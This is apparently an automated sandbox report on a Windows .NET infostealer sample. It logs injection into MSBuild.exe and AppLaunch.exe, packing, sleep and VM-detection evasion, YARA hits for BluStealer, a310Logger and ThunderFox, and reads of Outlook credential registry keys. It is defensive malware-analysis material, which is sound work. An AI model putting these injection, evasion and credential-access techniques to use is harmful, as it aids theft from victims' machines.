Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Virustotal: Detection: 25%
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Users\desktop.ini Jump to behavior
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';n
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;>Cannot add a PRIMARY KEY column4Cannot add a UNIQUE columntCannot add a REFERENCES column with non-NULL default valuehCannot add a NOT NULL column with default value NULLZCannot add a column with non-constant default
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' 4
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: hti.sLnagaugfe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: F*\AC:\Users\TSC\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp$
Source: MSBuild.exe, 0000000E.00000002.531785304.000000000046C000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: F*\AC:\Users\TSC\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Binary or memory string: .vbpmva
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Binary or memory string: mt]wXwA~ll.vbpmrv
Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static file information: File size 2457088 > 1048576
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x247e00
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ThunderFox.pdb source: AppLaunch.exe, 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, bgp.cs .Net Code: jmv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.AppLaunch.exe.4e00000.0.unpack, yX3qVQPc7HrPvyJ6nV/cZ6To4JeF1gFLqv7a4.cs .Net Code: TOsyUfqmE System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
.NET source code contains method to dynamically call methods (often used by packers)
Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_05484A0F push 5D669499h; ret 0_2_05484A29
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_06337E12 push es; retf 3382h 0_2_063388C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_06330540 pushad ; retf 0_2_06330541
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_063577AE push es; retf 0_2_063577BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_051322D4 push E9000001h; retn 0009h 16_2_051322E6
Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs High entropy of concatenated method names: '.cctor', 'R8V6PVGwssOvC', 'P2HJOU7G4', 'wcvPOg3MI', 'FGeQZ6To4', 'cF1ggFLqv', 'wa4rNX3qV', 'ec7CHrPvy', 'c6n3VdfEB', 'BOgbswNYn'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe TID: 2072 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 3508 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_05135D66 sldt word ptr [eax] 16_2_05135D66
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Binary or memory string: lqEMUttqO=
Source: MSBuild.exe, 0000000E.00000003.421672820.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_05134520 LdrInitializeThunk,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher, 16_2_05134520
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46C000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46D000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BB2008 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4D01008 Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected BluStealer
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
Yara detected a310Logger
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
Yara detected ThunderFox Stealer
Source: Yara match File source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
